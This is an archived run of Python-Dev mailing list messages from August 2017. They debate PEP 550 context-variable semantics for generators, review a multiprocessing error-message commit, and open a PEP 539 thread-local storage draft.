yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 19:54:05 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A5FA89.1000001@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Tue, Aug 29, 2017 at 7:36 PM, Greg Ewing wrote: > Yury Selivanov wrote: >> >> While we want "yield from" to have semantics close to a function call, > > > That's not what I said! I said that "yield from foo()" should > have semantics close to a function call. If you separate the > "yield from" from the "foo()", then of course you can get > different behaviours. > > But that's beside the point, because I'm not suggesting > that generators should behave differently depending on when > or if you use "yield from" on them. OK, that wasn't clear. Yury From yselivanov.ml at gmail.com Tue Aug 29 20:18:53 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 20:18:53 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A5FA89.1000001@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Tue, Aug 29, 2017 at 7:36 PM, Greg Ewing wrote: [..] >> For (1) we want the context change to be isolated. For (2) you say >> that the context change should propagate to the caller. > > > No, I'm saying that the context change should *always* > propagate to the caller, unless you do something explicit > within the generator to prevent it. > > I have some ideas on what that something might be, which > I'll post later. BTW we already have mechanisms to always propagate context to the caller -- just use threading.local() or a global variable. PEP 550 is for situations when you explicitly don't want to propagate the state. Anyways, I'm curious to hear your ideas. Yury From storchaka at gmail.com Wed Aug 30 01:48:56 2017 From: storchaka at gmail.com (Serhiy Storchaka) Date: Wed, 30 Aug 2017 08:48:56 +0300 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: <3xhkRl6v1MzFqct@mail.python.org> References: <3xhkRl6v1MzFqct@mail.python.org> Message-ID: 30.08.17 01:52, Antoine Pitrou ????: > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > branch: master > author: Allen W. Smith, Ph.D > committer: Antoine Pitrou > date: 2017-08-30T00:52:18+02:00 > summary: > > bpo-5001: More-informative multiprocessing error messages (#3079) > > * Make error message more informative > > Replace assertions in error-reporting code with more-informative version that doesn't cause confusion over where and what the error is. > > * Additional clarification + get travis to check > > * Change from SystemError to TypeError > > As suggested in PR comment by @pitrou, changing from SystemError; TypeError appears appropriate. > > * NEWS file installation; ACKS addition (will do my best to justify it by additional work) > > * Making current AssertionErrors in multiprocessing more informative > > * Blurb added re multiprocessing managers.py, queues.py cleanup > > * Further multiprocessing cleanup - went through pool.py > > * Fix two asserts in multiprocessing/util.py > > * Most asserts in multiprocessing more informative > > * Didn't save right version > > * Further work on multiprocessing error messages > > * Correct typo > > * Correct typo v2 > > * Blasted colon... serves me right for trying to work on two things at once > > * Simplify NEWS entry > > * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst > > * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst > > OK, never mind. > > * Corrected (thanks to pitrou) error messages for notify > > * Remove extraneous backslash in docstring. Please, please don't forget to edit commit messages before merging. An excessively verbose commit message will be kept in the repository forever and will harm future developers that read a history. From ncoghlan at gmail.com Wed Aug 30 02:40:23 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 30 Aug 2017 16:40:23 +1000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On 30 August 2017 at 10:18, Yury Selivanov wrote: > On Tue, Aug 29, 2017 at 7:36 PM, Greg Ewing wrote: > [..] >>> For (1) we want the context change to be isolated. For (2) you say >>> that the context change should propagate to the caller. >> >> >> No, I'm saying that the context change should *always* >> propagate to the caller, unless you do something explicit >> within the generator to prevent it. >> >> I have some ideas on what that something might be, which >> I'll post later. > > BTW we already have mechanisms to always propagate context to the > caller -- just use threading.local() or a global variable. PEP 550 is > for situations when you explicitly don't want to propagate the state. Writing an "update_parent_context" decorator is also trivial (and will work for both sync and async generators): def update_parent_context(gf): @functools.wraps(gf): def wrapper(*args, **kwds): gen = gf(*args, **kwds): gen.__logical_context__ = None return gen return wrapper The PEP already covers that approach when it talks about the changes to contextlib.contextmanager to get context changes to propagate automatically. With contextvars getting its own module, it would also be straightforward to simply include that decorator as part of its API, so folks won't need to write their own. While I'm not sure how much practical use it will see, I do think it's important to preserve the *ability* to transparently refactor generators using yield from - I'm just OK with such a refactoring becoming "yield from update_parent_context(subgen())" instead of the current "yield from subgen()" (as I think *not* updating the parent context is a better default than updating it). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Wed Aug 30 02:47:07 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 30 Aug 2017 16:47:07 +1000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On 30 August 2017 at 16:40, Nick Coghlan wrote: > Writing an "update_parent_context" decorator is also trivial (and will > work for both sync and async generators): > > def update_parent_context(gf): > @functools.wraps(gf): > def wrapper(*args, **kwds): > gen = gf(*args, **kwds): > gen.__logical_context__ = None > return gen > return wrapper [snip] > While I'm not sure how much practical use it will see, I do think it's > important to preserve the *ability* to transparently refactor > generators using yield from - I'm just OK with such a refactoring > becoming "yield from update_parent_context(subgen())" instead of the > current "yield from subgen()" (as I think *not* updating the parent > context is a better default than updating it). Oops, I got mixed up between whether I thought this should be a decorator or an explicitly called helper function. One option would be to provide both: def update_parent_context(gen): ""Configures a generator-iterator to update its caller's context variables"""" gen.__logical_context__ = None return gen def updates_parent_context(gf): ""Wraps a generator function's instances with update_parent_context"""" @functools.wraps(gf): def wrapper(*args, **kwds): return update_parent_context(gf(*args, **kwds)) return wrapper Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From solipsis at pitrou.net Wed Aug 30 05:39:31 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 30 Aug 2017 11:39:31 +0200 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) References: <3xhkRl6v1MzFqct@mail.python.org> Message-ID: <20170830113931.6730f2c3@fsol> On Wed, 30 Aug 2017 08:48:56 +0300 Serhiy Storchaka wrote: > 30.08.17 01:52, Antoine Pitrou ????: > > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > branch: master > > author: Allen W. Smith, Ph.D > > committer: Antoine Pitrou > > date: 2017-08-30T00:52:18+02:00 > > summary: > > > > bpo-5001: More-informative multiprocessing error messages (#3079) > > > > * Make error message more informative > > > > Replace assertions in error-reporting code with more-informative version that doesn't cause confusion over where and what the error is. > > > > * Additional clarification + get travis to check > > > > * Change from SystemError to TypeError > > > > As suggested in PR comment by @pitrou, changing from SystemError; TypeError appears appropriate. > > > > * NEWS file installation; ACKS addition (will do my best to justify it by additional work) > > > > * Making current AssertionErrors in multiprocessing more informative > > > > * Blurb added re multiprocessing managers.py, queues.py cleanup > > > > * Further multiprocessing cleanup - went through pool.py > > > > * Fix two asserts in multiprocessing/util.py > > > > * Most asserts in multiprocessing more informative > > > > * Didn't save right version > > > > * Further work on multiprocessing error messages > > > > * Correct typo > > > > * Correct typo v2 > > > > * Blasted colon... serves me right for trying to work on two things at once > > > > * Simplify NEWS entry > > > > * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst > > > > * Update 2017-08-18-17-16-38.bpo-5001.gwnthq.rst > > > > OK, never mind. > > > > * Corrected (thanks to pitrou) error messages for notify > > > > * Remove extraneous backslash in docstring. > > Please, please don't forget to edit commit messages before merging. An > excessively verbose commit message will be kept in the repository > forever and will harm future developers that read a history. Sorry, I routinely forget about it. Can we have an automated check for this? Regards Antoine. From ncoghlan at gmail.com Wed Aug 30 05:48:14 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 30 Aug 2017 19:48:14 +1000 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: <20170830113931.6730f2c3@fsol> References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On 30 August 2017 at 19:39, Antoine Pitrou wrote: > On Wed, 30 Aug 2017 08:48:56 +0300 > Serhiy Storchaka wrote: >> Please, please don't forget to edit commit messages before merging. An >> excessively verbose commit message will be kept in the repository >> forever and will harm future developers that read a history. > > Sorry, I routinely forget about it. Can we have an automated check for > this? Not while we're pushing the "squash & merge" button directly, as there's no opportunity for any automated hooks to run at that point :( More options open up if the actual commit is being handled by a bot, but even that would still depend on us providing an updated commit message via some mechanism. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From p.f.moore at gmail.com Wed Aug 30 05:55:38 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Wed, 30 Aug 2017 10:55:38 +0100 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On 30 August 2017 at 10:48, Nick Coghlan wrote: > On 30 August 2017 at 19:39, Antoine Pitrou wrote: >> On Wed, 30 Aug 2017 08:48:56 +0300 >> Serhiy Storchaka wrote: >>> Please, please don't forget to edit commit messages before merging. An >>> excessively verbose commit message will be kept in the repository >>> forever and will harm future developers that read a history. >> >> Sorry, I routinely forget about it. Can we have an automated check for >> this? > > Not while we're pushing the "squash & merge" button directly, as > there's no opportunity for any automated hooks to run at that point :( > > More options open up if the actual commit is being handled by a bot, > but even that would still depend on us providing an updated commit > message via some mechanism. We could have a check for PRs that contain multiple commits. The check would flag that the commit message needs manual editing before merging, and would act as a prompt for submitters who are willing to do so to squash their PRs themselves. Personally, I'd prefer that as, apart from admin activities like making sure the PR and issue number references are present and correct, I think the original submitter has a better chance of properly summarising the PR in the merged commit message anyway. Paul From chris.jerdonek at gmail.com Wed Aug 30 06:16:42 2017 From: chris.jerdonek at gmail.com (Chris Jerdonek) Date: Wed, 30 Aug 2017 03:16:42 -0700 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: <3xhkRc3H00zFrZN@mail.python.org> References: <3xhkRc3H00zFrZN@mail.python.org> Message-ID: https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > branch: master > author: Allen W. Smith, Ph.D > committer: Antoine Pitrou > date: 2017-08-30T00:52:18+02:00 > summary: > > ... > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1): > )) > return result > else: > + if chunksize < 1: > + raise ValueError( > + "Chunksize must be 1+, not {0:n}".format( > + chunksize)) > assert chunksize > 1 It looks like removing this assert statement was missed. --Chris > task_batches = Pool._get_tasks(func, iterable, chunksize) > result = IMapIterator(self._cache) > @@ -334,7 +340,9 @@ def imap_unordered(self, func, iterable, chunksize=1): > )) > return result > else: > - assert chunksize > 1 > + if chunksize < 1: > + raise ValueError( > + "Chunksize must be 1+, not {0!r}".format(chunksize)) > task_batches = Pool._get_tasks(func, iterable, chunksize) > result = IMapUnorderedIterator(self._cache) > self._taskqueue.put( From chris.jerdonek at gmail.com Wed Aug 30 06:21:42 2017 From: chris.jerdonek at gmail.com (Chris Jerdonek) Date: Wed, 30 Aug 2017 03:21:42 -0700 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: <3xhkRc3H00zFrZN@mail.python.org> References: <3xhkRc3H00zFrZN@mail.python.org> Message-ID: > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > branch: master > author: Allen W. Smith, Ph.D > committer: Antoine Pitrou > date: 2017-08-30T00:52:18+02:00 > summary: > > bpo-5001: More-informative multiprocessing error messages (#3079) > ... > @@ -254,8 +256,8 @@ def _setup_queues(self): > def apply(self, func, args=(), kwds={}): > ''' > Equivalent of `func(*args, **kwds)`. > + Pool must be running. > ''' > - assert self._state == RUN Also, this wasn't replaced with anything. --Chris > return self.apply_async(func, args, kwds).get() > > def map(self, func, iterable, chunksize=None): > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1): From k7hoven at gmail.com Wed Aug 30 08:19:16 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Wed, 30 Aug 2017 15:19:16 +0300 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A5FA89.1000001@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 2:36 AM, Greg Ewing wrote: > Yury Selivanov wrote: > >> While we want "yield from" to have semantics close to a function call, >> > > That's not what I said! I said that "yield from foo()" should > have semantics close to a function call. If you separate the > "yield from" from the "foo()", then of course you can get > different behaviours. > > But that's beside the point, because I'm not suggesting > that generators should behave differently depending on when > or if you use "yield from" on them. > > For (1) we want the context change to be isolated. For (2) you say >> that the context change should propagate to the caller. >> > > No, I'm saying that the context change should *always* > propagate to the caller, unless you do something explicit > within the generator to prevent it. > > I have some ideas on what that something might be, which > I'll post later. > > ?FYI, I've been sketching an alternative solution that addresses these kinds of things. I've been hesitant to post ?about it, partly because of the PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been describing, and partly because that might be a major distraction from other useful discussions, especially because I wasn't completely sure yet about whether my approach has some fatal flaw compared to PEP 550 ;). ?Koos -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From greg.ewing at canterbury.ac.nz Wed Aug 30 08:55:43 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Thu, 31 Aug 2017 00:55:43 +1200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: <59A6B5CF.4070902@canterbury.ac.nz> Yury Selivanov wrote: > BTW we already have mechanisms to always propagate context to the > caller -- just use threading.local() or a global variable. But then you don't have a way to *not* propagate the context change when you don't want to. Here's my suggestion: Make an explicit distinction between creating a new binding for a context var and updating an existing one. So instead of two API calls there would be three: contextvar.new(value) # Creates a new binding only # visible to this frame and # its callees contextvar.set(value) # Updates existing binding in # context inherited from caller contextvar.get() # Retrieves the current binding If we assume an extension to the decimal module so that decimal.localcontext is a context var, we can now do this: async def foo(): # Establish a new context for this task decimal.localcontext.new(decimal.Context()) # Delegate changing the context await bar() # Do some calculations yield 17 * math.pi + 42 async def bar(): # Change context for caller decimal.localcontext.prec = 5 -- Greg From yselivanov.ml at gmail.com Wed Aug 30 09:55:59 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 30 Aug 2017 09:55:59 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A6B5CF.4070902@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> <59A6B5CF.4070902@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 8:55 AM, Greg Ewing wrote: > Yury Selivanov wrote: > >> BTW we already have mechanisms to always propagate context to the >> caller -- just use threading.local() or a global variable. > > > But then you don't have a way to *not* propagate the > context change when you don't want to. > > Here's my suggestion: Make an explicit distinction between > creating a new binding for a context var and updating an > existing one. > > So instead of two API calls there would be three: > > contextvar.new(value) # Creates a new binding only > # visible to this frame and > # its callees > > contextvar.set(value) # Updates existing binding in > # context inherited from caller > > contextvar.get() # Retrieves the current binding > > If we assume an extension to the decimal module so > that decimal.localcontext is a context var, we can > now do this: > > async def foo(): > # Establish a new context for this task > decimal.localcontext.new(decimal.Context()) > # Delegate changing the context > await bar() > # Do some calculations > yield 17 * math.pi + 42 > > async def bar(): > # Change context for caller > decimal.localcontext.prec = 5 Interesting. Question: how to write a context manager with contextvar.new? var = new_context_var() class CM: def __enter__(self): var.new(42) with CM(): print(var.get() or 'None') My understanding that the above code will print "None", because "var.new()" makes 42 visible only to callees of __enter__. But if I use "set()" in "CM.__enter__", presumably, it will traverse the stack of LCs to the very bottom and set "var=42" in in it. Right? If so, how can fix the example in PEP 550 Rationale: https://www.python.org/dev/peps/pep-0550/#rationale where we zip() the "fractions()" generator? With current PEP 550 semantics that's trivial: https://www.python.org/dev/peps/pep-0550/#generators Yury From solipsis at pitrou.net Wed Aug 30 10:32:22 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 30 Aug 2017 16:32:22 +0200 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) References: <3xhkRc3H00zFrZN@mail.python.org> Message-ID: <20170830163222.67f882d2@fsol> On Wed, 30 Aug 2017 03:16:42 -0700 Chris Jerdonek wrote: > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > branch: master > > author: Allen W. Smith, Ph.D > > committer: Antoine Pitrou > > date: 2017-08-30T00:52:18+02:00 > > summary: > > > > ... > > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1): > > )) > > return result > > else: > > + if chunksize < 1: > > + raise ValueError( > > + "Chunksize must be 1+, not {0:n}".format( > > + chunksize)) > > assert chunksize > 1 > > It looks like removing this assert statement was missed. Good catch, thanks. Regards Antoine. From solipsis at pitrou.net Wed Aug 30 10:33:09 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 30 Aug 2017 16:33:09 +0200 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) References: <3xhkRc3H00zFrZN@mail.python.org> Message-ID: <20170830163309.3b31f71e@fsol> On Wed, 30 Aug 2017 03:21:42 -0700 Chris Jerdonek wrote: > > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > branch: master > > author: Allen W. Smith, Ph.D > > committer: Antoine Pitrou > > date: 2017-08-30T00:52:18+02:00 > > summary: > > > > bpo-5001: More-informative multiprocessing error messages (#3079) > > ... > > @@ -254,8 +256,8 @@ def _setup_queues(self): > > def apply(self, func, args=(), kwds={}): > > ''' > > Equivalent of `func(*args, **kwds)`. > > + Pool must be running. > > ''' > > - assert self._state == RUN > > Also, this wasn't replaced with anything. The check is already in apply_async(), checking it here again is redundant. Regards Antoine. From yselivanov.ml at gmail.com Wed Aug 30 10:36:20 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 30 Aug 2017 10:36:20 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov wrote: [..] >> FYI, I've been sketching an alternative solution that addresses these kinds >> of things. I've been hesitant to post about it, partly because of the >> PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been >> describing, and partly because that might be a major distraction from other >> useful discussions, especially because I wasn't completely sure yet about >> whether my approach has some fatal flaw compared to PEP 550 ;). > > We'll never know until you post it. Go ahead. The only alternative design that I considered for PEP 550 and ultimately rejected was to have a the following thread-specific mapping: { var1: [stack of values for var1], var2: [stack of values for var2] } So the idea is that when we set a value for the variable in some frame, we push it to its stack. When the frame is done, we pop it. This is a classic approach (called Shallow Binding) to implement dynamic scope. The fatal flow that made me to reject this approach was the CM protocol (__enter__). Specifically, context managers need to be able to control values in outer frames, and this is where this approach becomes super messy. Yury From yselivanov.ml at gmail.com Wed Aug 30 09:44:59 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 30 Aug 2017 09:44:59 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 8:19 AM, Koos Zevenhoven wrote: > On Wed, Aug 30, 2017 at 2:36 AM, Greg Ewing > wrote: >> >> Yury Selivanov wrote: >>> >>> While we want "yield from" to have semantics close to a function call, >> >> >> That's not what I said! I said that "yield from foo()" should >> have semantics close to a function call. If you separate the >> "yield from" from the "foo()", then of course you can get >> different behaviours. >> >> But that's beside the point, because I'm not suggesting >> that generators should behave differently depending on when >> or if you use "yield from" on them. >> >>> For (1) we want the context change to be isolated. For (2) you say >>> that the context change should propagate to the caller. >> >> >> No, I'm saying that the context change should *always* >> propagate to the caller, unless you do something explicit >> within the generator to prevent it. >> >> I have some ideas on what that something might be, which >> I'll post later. >> > > FYI, I've been sketching an alternative solution that addresses these kinds > of things. I've been hesitant to post about it, partly because of the > PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been > describing, and partly because that might be a major distraction from other > useful discussions, especially because I wasn't completely sure yet about > whether my approach has some fatal flaw compared to PEP 550 ;). We'll never know until you post it. Go ahead. Yury From phd at phdru.name Wed Aug 30 10:53:40 2017 From: phd at phdru.name (Oleg Broytman) Date: Wed, 30 Aug 2017 16:53:40 +0200 Subject: [Python-Dev] [Python-checkins] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: <20170830163222.67f882d2@fsol> References: <3xhkRc3H00zFrZN@mail.python.org> <20170830163222.67f882d2@fsol> Message-ID: <20170830145340.GA9342@phdru.name> Hi! On Wed, Aug 30, 2017 at 04:32:22PM +0200, Antoine Pitrou wrote: > On Wed, 30 Aug 2017 03:16:42 -0700 > Chris Jerdonek wrote: > > https://github.com/python/cpython/commit/bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > > commit: bd73e72b4a9f019be514954b1d40e64dc3a5e81c > > > branch: master > > > author: Allen W. Smith, Ph.D > > > committer: Antoine Pitrou > > > date: 2017-08-30T00:52:18+02:00 > > > summary: > > > > > > ... > > > @@ -307,6 +309,10 @@ def imap(self, func, iterable, chunksize=1): > > > )) > > > return result > > > else: > > > + if chunksize < 1: > > > + raise ValueError( > > > + "Chunksize must be 1+, not {0:n}".format( > > > + chunksize)) > > > assert chunksize > 1 The error condition was changed from `<= 1` to `< 1` -- was it intentional? > Regards > Antoine. Oleg. -- Oleg Broytman http://phdru.name/ phd at phdru.name Programmers don't die, they just GOSUB without RETURN. From yselivanov.ml at gmail.com Wed Aug 30 13:54:28 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 30 Aug 2017 13:54:28 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: On Wed, Aug 30, 2017 at 1:39 PM, Kevin Conway wrote: >> Can Execution Context be implemented outside of CPython > > I know I'm well late to the game and a bit dense, but where in the pep is > the justification for this assertion? I ask because we buy something to > solve the same problem in Twisted some time ago: > https://bitbucket.org/hipchat/txlocal . We were able to leverage > generator/coroutine decorators to preserve state without modifying the > runtime. > > Given that this problem only exists in runtime that multiplex coroutines on > a single thread and the fact that coroutine execution engines only exist in > user space, why doesn't it make more sense to leave this to a library that To work with coroutines we have asyncio/twisted or other frameworks. They create async tasks and manage them. Generators, OTOH, don't have a framework that runs them, they are managed by the Python interpreter. So its not possible to implement a *complete context solution* that equally supports generators and coroutines outside of the interpreter. Another problem, is that every framework has its own local context solution. Twisted has one, gevent has another. But libraries like numpy and decimal can't use them to store their local context data, because they are non-standard. That's why we need to solve this problem once in Python directly. Yury From kevinjacobconway at gmail.com Wed Aug 30 13:39:50 2017 From: kevinjacobconway at gmail.com (Kevin Conway) Date: Wed, 30 Aug 2017 17:39:50 +0000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz> Message-ID: > Can Execution Context be implemented outside of CPython I know I'm well late to the game and a bit dense, but where in the pep is the justification for this assertion? I ask because we buy something to solve the same problem in Twisted some time ago: https://bitbucket.org/hipchat/txlocal . We were able to leverage generator/coroutine decorators to preserve state without modifying the runtime. Given that this problem only exists in runtime that multiplex coroutines on a single thread and the fact that coroutine execution engines only exist in user space, why doesn't it make more sense to leave this to a library that engines like asyncio and Twisted are responsible for standardising on? On Wed, Aug 30, 2017, 09:40 Yury Selivanov wrote: > On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov > wrote: > [..] > >> FYI, I've been sketching an alternative solution that addresses these > kinds > >> of things. I've been hesitant to post about it, partly because of the > >> PEP550-based workarounds that Nick, Nathaniel, Yury etc. have been > >> describing, and partly because that might be a major distraction from > other > >> useful discussions, especially because I wasn't completely sure yet > about > >> whether my approach has some fatal flaw compared to PEP 550 ;). > > > > We'll never know until you post it. Go ahead. > > The only alternative design that I considered for PEP 550 and > ultimately rejected was to have a the following thread-specific > mapping: > > { > var1: [stack of values for var1], > var2: [stack of values for var2] > } > > So the idea is that when we set a value for the variable in some > frame, we push it to its stack. When the frame is done, we pop it. > This is a classic approach (called Shallow Binding) to implement > dynamic scope. The fatal flow that made me to reject this approach > was the CM protocol (__enter__). Specifically, context managers need > to be able to control values in outer frames, and this is where this > approach becomes super messy. > > Yury > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/kevinjacobconway%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ma3yuki.8mamo10 at gmail.com Thu Aug 31 04:16:59 2017 From: ma3yuki.8mamo10 at gmail.com (Masayuki YAMAMOTO) Date: Thu, 31 Aug 2017 17:16:59 +0900 Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython Message-ID: Hi python-dev, Since Erik started the PEP 539 thread on python-ideas, I've collected feedbacks in the discussion and pull-request, and tried improvement for the API specification and reference implementation, as the result I think resolved issues which pointed out by feedbacks. Well, it's probably not finish yet, there is one which bothers me. I'm not sure the CPython startup sequence design (PEP 432 Restructuring the CPython startup sequence, it might be a conflict with the draft specification [1]), please let me know what you think about the new API specification. In any case, I start a new thread of the updated draft. Summary of technical changes: - Two functions which correspond PyThread_delete_key_value and PyThread_ReInitTLS are omitted, because these are for the removed CPython's own TLS implementation. - Add an internal field "_is_initialized" and a constant default value "Py_tss_NEEDS_INIT" to Py_tss_t type to indicate the thread key's initialization state independent of the underlying implementation. - Then, define behaviors for functions which uses the "_is_initialized" field. - Change the key argument to pass a pointer, allow to use in the limited API that does not know the key type size. - Add three functions which dynamic (de-)allocation and the key's initialization state checking, because handle opaque struct. - Change platform support in the case of enabling thread support, all platforms are required at least one of native thread implementations. Also the draft has been added explanations and rationales for above changes, moreover, additional annotations for information. Regards, Masayuki [1]: The specifications of thread key creation and deletion refer how to use in the API clients (Modules/_tracemalloc.c and Python/pystate.c). One of those, Py_Initialize function that is a caller's origin of PyThread_tss_create is the flow "no-op when called for a second time" until CPython 3.6 [2]. However, an internal function _Py_InitializeCore that has been added newly in the current master branch is the flow "fatal error when called for a second time" [3]. [2]: https://docs.python.org/3.6/c-api/init.html#c.Py_Initialize [3]: https://github.com/python/cpython/blob/master/Python/pylifecycle.c#L508 First round for PEP 539: https://mail.python.org/pipermail/python-ideas/2016-December/043983.html Discussion for the issue: https://bugs.python.org/issue25658 HTML version for PEP 539 draft: https://www.python.org/dev/peps/pep-0539/ Diff between first round and second round: https://gist.github.com/ma8ma/624f9e4435ebdb26230130b11ce12d20/revisions And the pull-request for reference implementation (work in progress): https://github.com/python/cpython/pull/1362 ======================================== PEP: 539 Title: A New C-API for Thread-Local Storage in CPython Version: $Revision$ Last-Modified: $Date$ Author: Erik M. Bray, Masayuki Yamamoto BDFL-Delegate: Nick Coghlan Status: 